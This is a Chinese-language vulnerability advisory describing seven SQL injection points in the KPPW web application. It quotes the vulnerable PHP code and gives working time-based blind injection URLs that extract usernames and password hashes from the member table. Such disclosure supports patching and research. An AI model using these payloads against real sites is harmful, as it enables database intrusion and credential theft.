|KPPW最新版SQL注入漏洞七(多处不同注入点)

KPPW最新版SQL注入漏洞七(多处不同注入点)

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述： KPPW最新版SQL注入漏洞七(多处不同注入点) ### 详细说明： KPPW最新版SQL注入漏洞七，多处不同注入点第一处sql注入：文件/control/user/transaction_works.php: ``` if($action == 'delete_image'){ $strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileid); $arrFileInfo = db_factory::get_one($strSql); $resText = CommonClass::delFileByFileId($fileid); if($resText){ $array = explode(',', $arrServiceInfo['pic']); $newArr = CommonClass::returnNewArr($arrFileInfo['save_name'], $array); $_POST['file_ids'] = implode(",", $newArr); updateFilepath($arrServiceInfo['service_id'], $_POST['file_ids'], 'pic'); kekezu::echojson('删除成功',1,array('fileid'=>$fileid,'save_name'=>$arrFileInfo['save_name']));die; } } ``` 注意这里： ``` $strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileid); ``` $fileid没有引号保护进入sql语句，导致存在注入第二，三处sql注入：继续看下面的： ``` $resText = CommonClass::delFileByFileId($fileid); ``` $fileid继续进入了函数delFileByFileId，跟进函数delFileByFileId：文件：/lib/inc/CommonClass.php ``` public static function delFileByFileId($fileId){ $strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileId); $arrFileInfo = db_factory::get_one($strSql); $filename = S_ROOT.$arrFileInfo['save_name']; if(file_exists($filename)){ unlink($filename); } return db_factory::execute("delete from ".TABLEPRE."witkey_file where file_id = ".$fileId); } ``` 这里存在两处注入，$fileid变量进入select和delete语句都没有处理，导致sql注入第四，五，六处sql注入：同意的问题出现在文件/control/user/transaction_works.php： ``` if($action == 'delete_goodsfile'){ $strSql = sprintf("select file_id,file_name,save_name from %switkey_file where file_id in(%s)",TABLEPRE,$fileid); $arrFileInfo = db_factory::get_one($strSql); $resText = CommonClass::delFileByFileId($fileid); if($resText){ $array = explode(',', $arrServiceInfo['file_path']); $newArr = CommonClass::returnNewArr($arrFileInfo['save_name'], $array); $_POST['file_path_2'] = implode(",", $newArr); updateFilepath($arrServiceInfo['service_id'], $_POST['file_path_2'], 'file'); kekezu::echojson('删除成功',1,array('fileid'=>$fileid,'save_name'=>$arrFileInfo['save_name']));die; } } ``` 这里的问题跟上面分析的问题一样，存在注入。第七处sql注入：文件/control/user/transaction_works.php： ``` if (isset($formhash)&&kekezu::submitcheck($formhash)) { $arrGoodsConfig = unserialize($kekezu->_model_list[6]['config']); $goodsprice = floatval($goodsprice); $floatMinCash = floatval($arrGoodsConfig['min_cash']); if($floatMinCash&&($goodsprice < $floatMinCash)){ $tips['errors']['goodsprice'] = '最小金额不能少于'.$floatMinCash.'元'; kekezu::show_msg($tips,null,NULL,NULL,'error'); } if (strtoupper ( CHARSET ) == 'GBK') { $goodsname = kekezu::utftogbk($goodsname ); $goodsdesc = kekezu::utftogbk($goodsdesc ); $unite_price = kekezu::utftogbk($unite_price ); } $arrData = array( 'model_id'=> $arrServiceInfo['model_id']?$arrServiceInfo['model_id']:6, 'uid'=> $gUid, 'username'=> $gUserInfo['username'], 'indus_id'=> $indus_id, 'indus_pid'=> $indus_pid, 'title'=> $goodsname, 'price' => $goodsprice, 'pic'=> $file_ids, 'content'=> $goodsdesc, 'unite_price'=> $unite_price, 'submit_method'=> $submit_method, 'file_path'=> $file_path_2, 'confirm_max' => intval($arrGoodsConfig['confirm_max_day']) ); if(!$pk['service_id']){ $arrData['profit_rate'] = $arrGoodsConfig['service_profit']; $arrData['on_time'] = time(); $arrData['service_status'] = 2; } $objServiceT = new keke_table_class ( 'witkey_service' ); $objServiceT->save ( $arrData,$pk); unset($objServiceT); if ($objId&&$intTaskId) { $strBidSql = ' UPDATE `'.TABLEPRE.'witkey_task_bid` SET `hasdel`=1 WHERE (`bid_id` ='.$objId.') and task_id = '.$intTaskId; $strWorkSql = ' UPDATE `'.TABLEPRE.'witkey_task_work` SET `hasdel`=1 WHERE (`work_id`='.$objId.') and task_id = '.$intTaskId; db_factory::execute($strBidSql); db_factory::execute($strWorkSql); } kekezu::show_msg('操作成功',$strJumpUrl,NULL,NULL,'ok'); } ``` 注意这里的： ``` $objServiceT->save ( $arrData,$pk); ``` 这里的变量$pk进入了save函数，跟进save函数文件/lib/inc/keke_table_class.php： ``` function save($fields, $pk = array()) { foreach ( $fields as $k => $v ) { $kk = ucfirst ( $k ); $set_query = "set" . $kk; $this->_table_obj->$set_query ( $v ); } $keys = array_keys ( $pk ); $key = $keys [0]; //echo $key."\n"; //print_r($pk); //echo $pk[$key]; if (! empty ( $pk [$key] )) { $this->_table_obj->setWhere ( " $key = '" . $pk [$key] . "'" ); $edit_query = "edit_" . $this->_pre . $this->_table_name; $res = $this->_table_obj->$edit_query (); } else { $create_query = "create_" . $this->_pre . $this->_table_name; $res = $this->_table_obj->$create_query (); } if ($res) { return $res; } else { return false; } } ``` 最后$pk的key进入了setWhere条件语句中，导致sql注入 ### 漏洞证明：第一处SQL注入： ``` http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=editwork&action=delete_image&fileid=5566) and 1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2)%23 ``` 这里会延迟5秒返回，说明UserName第一个字符为a，继续即可注入出用户信息第二，三处SQL注入： ``` http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=editwork&action=delete_image&fileid=5566 and 1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2) ``` 这里会延迟5秒返回，说明UserName第一个字符为a，继续即可注入出用户信息 [<img src="https://images.seebug.org/upload/201412/08225401a02eaa8ba1f8c147291609bea094275c.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/08225401a02eaa8ba1f8c147291609bea094275c.png) 第七处SQL注入： ``` http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=editwork formhash=6cb7d4&objId=0&pk%5Bservice_id=1+and+1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2)%23%5D=222222&goodsname=111&goodsdesc=111&indus_pid=249&indus_id=-1&upload=&file_ids=&goodsprice=111&unite_price=%E4%B8%AA&submit_method=outside&file_upload_i=&file_path_2= ``` 这里会延迟5秒返回，说明UserName第一个字符为a，继续即可注入出用户信息

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™